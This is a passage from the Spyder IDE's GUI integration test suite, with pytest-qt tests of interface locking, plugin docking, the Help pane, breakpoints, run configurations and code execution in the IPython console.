CIs") def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir): """Test single instance mode and %edit magic.""" editorstack = main_window.editor.get_current_editorstack() shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) spy_dir = osp.dirname(get_module_path('spyder')) lock_code = ( "import sys\n" "sys.path.append(r'{spy_dir_str}')\n" "from spyder.utils.external import lockfile\n" "lock_file = r'{lock_file}'\n" "lock = lockfile.FilesystemLock(lock_file)\n" "lock_created = lock.lock()\n" "print(lock_created)".format( spy_dir_str=spy_dir, lock_file=get_conf_path('spyder.lock')) ) with qtbot.waitSignal(shell.executed, timeout=2000): shell.execute(lock_code) qtbot.wait(1000) assert not shell.get_value('lock_created') # Test %edit magic n_editors = editorstack.get_stack_count() p = tmpdir.mkdir("foo").join("bar.py") p.write(lock_code) with qtbot.waitSignal(shell.executed): shell.execute('%edit {}'.format(to_text_string(p))) qtbot.wait(3000) assert editorstack.get_stack_count() == n_editors + 1 assert editorstack.get_current_editor().toPlainText() == lock_code main_window.editor.close_file() @pytest.mark.slow def test_lock_action(main_window): """Test the lock interface action.""" action = main_window.layouts.lock_interface_action plugins = main_window.widgetlist # By default the interface is locked. assert main_window.layouts._interface_locked # In this state the title bar is an empty QWidget for plugin in plugins: title_bar = plugin.dockwidget.titleBarWidget() assert not isinstance(title_bar, DockTitleBar) assert isinstance(title_bar, QWidget) # Test that our custom title bar is shown when the action # is triggered. action.trigger() for plugin in plugins: title_bar = plugin.dockwidget.titleBarWidget() assert isinstance(title_bar, DockTitleBar) assert not main_window.layouts._interface_locked # Restore default state action.trigger() assert main_window.layouts._interface_locked @pytest.mark.slow @pytest.mark.order(1) @pytest.mark.skipif(sys.platform.startswith('linux') and not running_in_ci(), reason='Fails on Linux when run locally') def test_default_plugin_actions(main_window, qtbot): """Test the effect of dock, undock, close and toggle view actions.""" # Use a particular plugin file_explorer = main_window.explorer main_widget = file_explorer.get_widget() # Undock action main_widget.undock_action.triggered.emit(True) qtbot.wait(500) main_widget.windowwidget.move(200, 200) assert not file_explorer.dockwidget.isVisible() assert main_widget.undock_action is not None assert isinstance(main_widget.windowwidget, SpyderWindowWidget) assert main_widget.windowwidget.centralWidget() == main_widget # Dock action main_widget.dock_action.triggered.emit(True) qtbot.wait(500) assert file_explorer.dockwidget.isVisible() assert main_widget.windowwidget is None # Test geometry was saved on close geometry = file_explorer.get_conf('window_geometry') assert geometry != '' # Test restoring undocked plugin with the right geometry file_explorer.set_conf('undocked_on_window_close', True) main_window.restore_undocked_plugins() assert main_widget.windowwidget is not None assert ( geometry == qbytearray_to_str(main_widget.windowwidget.saveGeometry()) ) main_widget.windowwidget.close() # Close action main_widget.close_action.triggered.emit(True) qtbot.wait(500) assert not file_explorer.dockwidget.isVisible() assert not file_explorer.toggle_view_action.isChecked() # Toggle view action file_explorer.toggle_view_action.setChecked(True) assert file_explorer.dockwidget.isVisible() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True) def test_opengl_implementation(main_window, qtbot): """ Test that we are setting the selected OpenGL implementation """ assert main_window._test_setting_opengl('software') # Restore default config value CONF.set('main', 'opengl', 'automatic') @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif( np.__version__ < '1.14.0' or (os.name == 'nt' and PY2), reason="This only happens in Numpy 1.14+" ) @pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True) def test_filter_numpy_warning(main_window, qtbot): """ Test that we filter a warning shown when an array contains nan values and the Variable Explorer option 'Show arrays min/man' is on. For spyder-ide/spyder#7063. """ shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Create an array with a nan value with qtbot.waitSignal(shell.executed): shell.execute('import numpy as np; A=np.full(16, np.nan)') qtbot.wait(1000) # Assert that no warnings are shown in the console assert "warning" not in control.toPlainText() assert "Warning" not in control.toPlainText() # Restore default config value CONF.set('variable_explorer', 'minmax', False) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(PY2 or not sys.platform == 'darwin', reason="Times out in PY2 and fails on other than macOS") def test_get_help_combo(main_window, qtbot): """ Test that Help can display docstrings for names typed in its combobox. """ shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview if WEBENGINE: webpage = webview.page() else: webpage = webview.page().mainFrame() # --- From the console --- # Write some object in the console with qtbot.waitSignal(shell.executed): shell.execute('import numpy as np') # Get help - numpy object_combo = help_plugin.get_widget().object_combo object_combo.setFocus() qtbot.keyClicks(object_combo, 'numpy', delay=100) # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000) # Get help - numpy.arange qtbot.keyClicks(object_combo, '.arange', delay=100) # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000) # Get help - np # Clear combo object_combo.set_current_text('') qtbot.keyClicks(object_combo, 'np', delay=100) # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000) # Get help - np.arange qtbot.keyClicks(object_combo, '.arange', delay=100) # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000) @pytest.mark.slow @pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.") def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir): """ Test that Help works when called from the IPython console with dot calls i.e np.sin See spyder-ide/spyder#11821 """ shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Open test file test_file = osp.join(LOCATION, 'script_unicode.py') main_window.editor.load(test_file) code_editor = main_window.editor.get_focus_widget() # Run test file qtbot.keyClick(code_editor, Qt.Key_F5) qtbot.wait(500) help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() # Write function name qtbot.keyClicks(control, u'np.linalg.norm') # Get help control.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil( lambda: check_text(webpage, "Matrix or vector norm."), timeout=6000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="Too flaky on Mac") def test_get_help_ipython_console_special_characters( main_window, qtbot, tmpdir): """ Test that Help works when called from the IPython console for unusual characters. See spyder-ide/spyder#7699 """ shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Open test file test_file = osp.join(LOCATION, 'script_unicode.py') main_window.editor.load(test_file) code_editor = main_window.editor.get_focus_widget() # Run test file qtbot.keyClick(code_editor, Qt.Key_F5) qtbot.wait(500) help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() # Write function name and assert in Console def check_control(control, value): return value in control.toPlainText() qtbot.keyClicks(control, u'aa\t') qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000) # Get help control.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."), timeout=6000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt' and running_in_ci(), reason="Times out on Windows") def test_get_help_ipython_console(main_window, qtbot): """Test that Help works when called from the IPython console.""" shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() # Write some object in the console qtbot.keyClicks(control, 'runfile') # Get help control.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="Does not work on Mac and Windows!") @pytest.mark.use_introspection @pytest.mark.parametrize( "object_info", [("range", "range"), ("import numpy as np", "An array object of arbitrary homogeneous items")]) def test_get_help_editor(main_window, qtbot, object_info): """Test that Help works when called from the Editor.""" help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() main_window.editor.new(fname="test.py", text="") code_editor = main_window.editor.get_focus_widget() editorstack = main_window.editor.get_current_editorstack() with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() # Write some object in the editor object_name, expected_text = object_info code_editor.set_text(object_name) code_editor.move_cursor(len(object_name)) with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000): code_editor.document_did_change() # Get help with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000): editorstack.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000) @pytest.mark.slow def test_window_title(main_window, tmpdir): """Test window title with non-ascii characters.""" projects = main_window.projects # Create a project in non-ascii path path = to_text_string(tmpdir.mkdir(u'測試')) projects.open_project(path=path) # Set non-ascii window title main_window.window_title = u'اختبار' # Assert window title is computed without errors # and has the expected strings main_window.set_window_title() title = main_window.base_title assert u'Spyder' in title assert u'Python' in title assert u'اختبار' in title assert u'測試' in title projects.close_project() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="Fails sometimes on Windows and Mac") @pytest.mark.parametrize("debugcell", [True, False]) def test_move_to_first_breakpoint(main_window, qtbot, debugcell): """Test that we move to the first breakpoint if there's one present.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables control = shell._control debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # Load test file test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) code_editor = main_window.editor.get_focus_widget() # Set breakpoint code_editor.debugger.toogle_breakpoint(line_number=10) qtbot.wait(500) cursor = code_editor.textCursor() cursor.setPosition(0) code_editor.setTextCursor(cursor) if debugcell: # Advance 2 cells for i in range(2): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(500) # Debug the cell with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier | Qt.ShiftModifier) # Make sure everything is ready assert shell.spyder_kernel_comm.is_open() assert shell.is_waiting_pdb_input() with qtbot.waitSignal(shell.executed): shell.pdb_execute('!b') assert 'script.py:10' in shell._control.toPlainText() # We need to press continue as we don't test yet if a breakpoint # is in the cell with qtbot.waitSignal(shell.executed): shell.pdb_execute('!c') else: # Click the debug button with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Verify that we are at first breakpoint shell.clear_console() qtbot.wait(500) with qtbot.waitSignal(shell.executed): shell.pdb_execute("!list") assert "1--> 10 arr = np.array(li)" in control.toPlainText() # Exit debugging with qtbot.waitSignal(shell.executed): shell.pdb_execute("!exit") # Set breakpoint on first line with code code_editor.debugger.toogle_breakpoint(line_number=2) # Click the debug button with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Wait until continue and stop on the breakpoint qtbot.waitUntil(lambda: "IPdb [2]:" in control.toPlainText()) # Verify that we are still on debugging assert shell.is_waiting_pdb_input() # Remove breakpoint and close test file main_window.editor.clear_all_breakpoints() main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!') def test_runconfig_workdir(main_window, qtbot, tmpdir): """Test runconfig workdir options.""" from spyder.plugins.run.widgets import RunConfiguration CONF.set('run', 'configurations', []) # ---- Load test file ---- test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) code_editor = main_window.editor.get_focus_widget() # --- Use cwd for this file --- rc = RunConfiguration().get() rc['file_dir'] = False rc['cw_dir'] = True config_entry = (test_file, rc) CONF.set('run', 'configurations', [config_entry]) # --- Run test file --- shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) qtbot.keyClick(code_editor, Qt.Key_F5) qtbot.wait(500) # --- Assert we're in cwd after execution --- with qtbot.waitSignal(shell.executed): shell.execute('import os; current_dir = os.getcwd()') assert shell.get_value('current_dir') == get_home_dir() # --- Use fixed execution dir for test file --- temp_dir = str(tmpdir.mkdir("test_dir")) rc['file_dir'] = False rc['cw_dir'] = False rc['fixed_dir'] = True rc['dir'] = temp_dir config_entry = (test_file, rc) CONF.set('run', 'configurations', [config_entry]) # --- Run test file --- shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) qtbot.keyClick(code_editor, Qt.Key_F5) qtbot.wait(500) # --- Assert we're in fixed dir after execution --- with qtbot.waitSignal(shell.executed): shell.execute('import os; current_dir = os.getcwd()') assert shell.get_value('current_dir') == temp_dir # ---- Closing test file and resetting config ---- main_window.editor.close_file() CONF.set('run', 'configurations', []) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin', reason="It's failing there") def test_dedicated_consoles(main_window, qtbot): """Test running code in dedicated consoles.""" from spyder.plugins.run.widgets import RunConfiguration # ---- Load test file ---- test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) code_editor = main_window.editor.get_focus_widget() # --- Set run options for this file --- rc = RunConfiguration().get() # A dedicated console is used when these two options are False rc['current'] = rc['systerm'] = False config_entry = (test_file, rc) CONF.set('run', 'configurations', [config_entry]) # --- Run test file and assert that we get a dedicated console --- qtbot.keyClick(code_editor, Qt.Key_F5) qtbot.wait(500) shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) nsb = main_window.variableexplorer.current_widget() assert len(main_window.ipyconsole.get_clients()) == 2 assert main_window.ipyconsole.get_widget().filenames == ['', test_file] assert main_window.ipyconsole.get_widget().tabwidget.tabText(1) == 'script.py/A' qtbot.wait(500) assert nsb.editor.source_model.rowCount() == 4 # --- Assert only runfile text is present and there's no banner text --- # See spyder-ide/spyder#5301. text = control.toPlainText() assert ('runfile' in text) and not ('Python' in text or 'IPython' in text) # --- Clean namespace after re-execution --- with qtbot.waitSignal(shell.executed): shell.execute('zz = -1') qtbot.keyClick(code_editor, Qt.Key_F5) qtbot.wait(500) assert not shell.is_defined('zz') # --- Assert runfile text is present after reruns --- assert 'runfile' in control.toPlainText() # ---- Closing test file and resetting config ---- main_window.editor.close_file() CONF.set('run', 'configurations', []) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform.startswith('linux'), reason="Fails frequently on Linux") def test_connection_to_external_kernel(main_window, qtbot): """Test that only Spyder kernels are connected to the Variable Explorer.""" # Test with a generic kernel km, kc = start_new_kernel() main_window.ipyconsole.get_widget()._create_client_for_kernel( kc.connection_file, None, None, None) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Assert that there are no variables in the variable explorer main_window.variableexplorer.change_visibility(True) nsb = main_window.variableexplorer.current_widget() qtbot.wait(500) assert nsb.editor.source_model.rowCount() == 0 python_shell = shell # Test with a kernel from Spyder spykm, spykc = start_new_kernel(spykernel=True) main_window.ipyconsole.get_widget()._create_client_for_kernel( spykc.connection_file, None, None, None) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Assert that a variable is visible in the variable explorer main_window.variableexplorer.change_visibility(True) nsb = main_window.variableexplorer.current_widget() qtbot.wait(500) assert nsb.editor.source_model.rowCount() == 1 # Test runfile in external_kernel run_action = main_window.run_toolbar_actions[0] run_button = main_window.run_toolbar.widgetForAction(run_action) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text( "print(2 + 1)" ) # Start running with qtbot.waitSignal(shell.executed): qtbot.mouseClick(run_button, Qt.LeftButton) assert "runfile" in shell._control.toPlainText() assert "3" in shell._control.toPlainText() # Try quitting the kernels shell.execute('quit()') python_shell.execute('quit()') qtbot.wait(1000) # Make sure everything quit properly assert not km.is_alive() assert not spykm.is_alive() # Close the channels spykc.stop_channels() kc.stop_channels() @pytest.mark.order(1) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows") def test_change_types_in_varexp(main_window, qtbot): """Test that variable types can't be changed in the Variable Explorer.""" # Create object shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Edit object main_window.variableexplorer.change_visibility(True) nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT) nsb.editor.setFocus() nsb.editor.edit_item() # Try to change types qtbot.keyClicks(QApplication.focusWidget(), "'s'") qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter) qtbot.wait(1000) # Assert object remains the same assert shell.get_value('a') == 10 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"]) @pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS") def test_change_cwd_ipython_console( main_window, qtbot, tmpdir, test_directory): """ Test synchronization with working directory and File Explorer when changing cwd in the IPython console. """ wdir = main_window.workingdirectory treewidget = main_window.explorer.get_widget().treewidget shell = main_window.ipyconsole.get_current_shellwidget() # Wait until the window is fully up qtbot.waitUntil( lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Create temp dir temp_dir = str(tmpdir.mkdir(test_directory)) # Change directory in IPython console using %cd with qtbot.waitSignal(shell.executed): shell.execute(u"%cd {}".format(temp_dir)) qtbot.wait(1000) # Assert that cwd changed in workingdirectory assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath( temp_dir) # Assert that cwd changed in explorer assert osp.normpath(treewidget.get_current_folder()) == osp.normpath( temp_dir) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"]) @pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS") def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory): """ Test synchronization with working directory and IPython console when changing directories in the File Explorer. """ wdir = main_window.workingdirectory explorer = main_window.explorer shell = main_window.ipyconsole.get_current_shellwidget() # Wait until the window is fully up qtbot.waitUntil( lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Create temp directory temp_dir = to_text_string(tmpdir.mkdir(test_directory)) # Change directory in the explorer widget explorer.chdir(temp_dir) qtbot.wait(1000) # Assert that cwd changed in workingdirectory assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath( temp_dir) # Assert that cwd changed in IPython console assert osp.normpath(temp_dir) == osp.normpath(shell._cwd) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif( (os.name == 'nt' or sys.platform == 'darwin' or parse_version(ipy_release.version) == parse_version('7.11.0')), reason="Hard to test on Windows and macOS and fails for IPython 7.11.0") def test_run_cython_code(main_window, qtbot): """Test all the different ways we have to run Cython code""" # ---- Setup ---- # Get a reference to the code editor widget code_editor = main_window.editor.get_focus_widget() # ---- Run pyx file ---- # Load test file main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx')) # Run file qtbot.keyClick(code_editor, Qt.Key_F5) # Get a reference to the namespace browser widget nsb = main_window.variableexplorer.current_widget() # Wait until an object appears qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1, timeout=COMPILE_AND_EVAL_TIMEOUT) # Verify result shell = main_window.ipyconsole.get_current_shellwidget() assert shell.get_value('a') == 3628800 # Reset and close file reset_run_code(qtbot, shell, code_editor, nsb) main_window.editor.close_file() # ---- Import pyx file ---- # Load test file main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py')) # Run file qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1, timeout=COMPILE_AND_EVAL_TIMEOUT) # Verify result assert shell.get_value('b') == 3628800 # Close file main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.") def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir): """Test that notebooks are open from the Project explorer.""" projects = main_window.projects projects.toggle_view_action.setChecked(True) editorstack = main_window.editor.get_current_editorstack() # Create a temp project directory project_dir = to_text_string(tmpdir.mkdir('test')) # Create an empty notebook in the project dir nb = osp.join(LOCATION, 'notebook.ipynb') shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb')) # Create project with qtbot.waitSignal(projects.sig_project_loaded): projects._create_project(project_dir) # Select notebook in the project explorer idx = projects.get_widget().treewidget.get_index( osp.join(project_dir, 'notebook.ipynb')) projects.get_widget().treewidget.setCurrentIndex(idx) # Prese Enter there qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter) # Assert that notebook was open assert 'notebook.ipynb' in editorstack.get_current_filename() # Convert notebook to a Python file projects.get_widget().treewidget.convert_notebook( osp.join(project_dir, 'notebook.ipynb')) # Assert notebook was open assert 'untitled' in editorstack.get_current_filename() # Assert its contents are the expected ones file_text = editorstack.get_current_editor().toPlainText() if nbconvert.__version__ >= '5.4.0': expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:' '\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n') else: expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n' assert file_text == expected_text # Close project projects.close_project() @pytest.mark.slow @flaky(max_runs=3) def test_runfile_from_project_explorer(main_window, qtbot, tmpdir): """Test that file are run from the Project explorer.""" projects = main_window.projects projects.toggle_view_action.setChecked(True) editorstack = main_window.editor.get_current_editorstack() # Create a temp project directory project_dir = to_text_string(tmpdir.mkdir('test')) # Create an empty file in the project dir test_file = osp.join(LOCATION, 'script.py') shutil.copy(test_file, osp.join(project_dir, 'script.py')) # Create project with qtbot.waitSignal(projects.sig_project_loaded): projects._create_project(project_dir) # Select file in the project explorer idx = projects.get_widget().treewidget.get_index( osp.join(project_dir, 'script.py')) projects.get_widget().treewidget.setCurrentIndex(idx) # Press Enter there qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter) # Assert that the file was open assert 'script.py' in editorstack.get_current_filename() # Run Python file projects.get_widget().treewidget.run([osp.join(project_dir, 'script.py')]) # Wait until the new console is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Wait until all objects have appeared in the variable explorer nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Check variables value assert shell.get_value('a') == 10 assert shell.get_value('s') == "Z:\\escape\\test\\string\n" assert shell.get_value('li') == [1, 2, 3] assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3])) # Close project projects.close_project() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows") def test_set_new_breakpoints(main_window, qtbot): """Test that new breakpoints are set in the IPython console.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # Load test file test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Set a breakpoint code_editor = main_window.editor.get_focus_widget() code_editor.debugger.toogle_breakpoint(line_number=6) # Verify that the breakpoint was set with qtbot.waitSignal(shell.executed): shell.pdb_execute("!b") assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText() # Remove breakpoint and close test file main_window.editor.clear_all_breakpoints() main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) def test_run_code(main_window, qtbot, tmpdir): """Test all the different ways we have to run code""" # ---- Setup ---- p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误") .join(u"runtest's file èáïü Øαôå 字分误.py")) filepath = to_text_string(p) shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath) # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file main_window.editor.load(filepath) # Move to the editor's first line code_editor = main_window.editor.get_focus_widget() code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier) # Get a reference to the namespace browser widget nsb = main_window.variableexplorer.current_widget() # ---- Run file ---- qtbot.keyClick(code_editor, Qt.Key_F5) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Verify result assert shell.get_value('a') == 10 assert shell.get_value('s') == "Z:\\escape\\test\\string\n" assert shell.get_value('li') == [1, 2, 3] assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3])) reset_run_code(qtbot, shell, code_editor, nsb) # ---- Run lines ---- # Run the whole file line by line for _ in range(code_editor.blockCount()): qtbot.keyClick(code_editor, Qt.Key_F9) qtbot.wait(200) # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Verify result assert shell.get_value('a') == 10 assert shell.get_value('s') == "Z:\\escape\\test\\string\n" assert shell.get_value('li') == [1, 2, 3] assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3])) reset_run_code(qtbot, shell, code_editor, nsb) # ---- Run cell and advance ---- # Run the five cells present in file # Add an unnamed cell at the top of the file qtbot.keyClicks(code_editor, 'a = 10') qtbot.keyClick(code_editor, Qt.Key_Return) qtbot.keyClick(code_editor, Qt.Key_Up) for _ in range(5): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(500) # Check for errors and the runcell function assert 'runcell' in shell._control.toPlainText() assert 'Error:' not in shell._control.toPlainText() control_text = shell._control.toPlainText() # Rerun shell.setFocus() qtbot.keyClick(shell._control, Qt.Key_Up) qtbot.wait(500) qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier) qtbot.wait(500) code_editor.setFocus() assert control_text != shell._control.toPlainText() control_text = shell._control.toPlainText()[len(control_text):] # Check for errors and the runcell function assert 'runcell' in control_text assert 'Error' not in control_text # Wait until all objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4, timeout=EVAL_TIMEOUT) # Verify result assert ']: 10\n' in shell._control.toPlainText() assert shell.get_value('a') == 10 assert shell.get_value('s') == "Z:\\escape\\test\\string\n" assert shell.get_value('li') == [1, 2, 3] assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3])) reset_run_code(qtbot, shell, code_editor, nsb) # ---- Run cell ---- # Run the first cell in file modifier = Qt.ControlModifier if sys.platform == 'darwin': modifier = Qt.MetaModifier qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier) # Wait until the object has appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1, timeout=EVAL_TIMEOUT) # Verify result assert shell.get_value('a') == 10 # Press Ctrl+Enter a second time to verify that we're *not* advancing # to the next cell qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier) assert nsb.editor.source_model.rowCount() == 1 reset_run_code(qtbot, shell, code_editor, nsb) # ---- Debug cell ------ with qtbot.waitSignal(shell.executed): qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier | Qt.ShiftModifier) qtbot.keyClicks(shell._control, '!c') qtbot.keyClick(shell._control, Qt.Key_Enter) # Wait until the object has appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1, timeout=EVAL_TIMEOUT) reset_run_code(qtbot, shell, code_editor, nsb) # ---- Re-run last cell ---- # Run the first three cells in file qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(500) qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) qtbot.wait(500) qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier) # Wait until objects have appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2, timeout=EVAL_TIMEOUT) # Clean namespace with qtbot.waitSignal(shell.executed): shell.execute('%reset -f') # Wait until there are no objects in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT) # Re-run last cell qtbot.keyClick(code_editor, 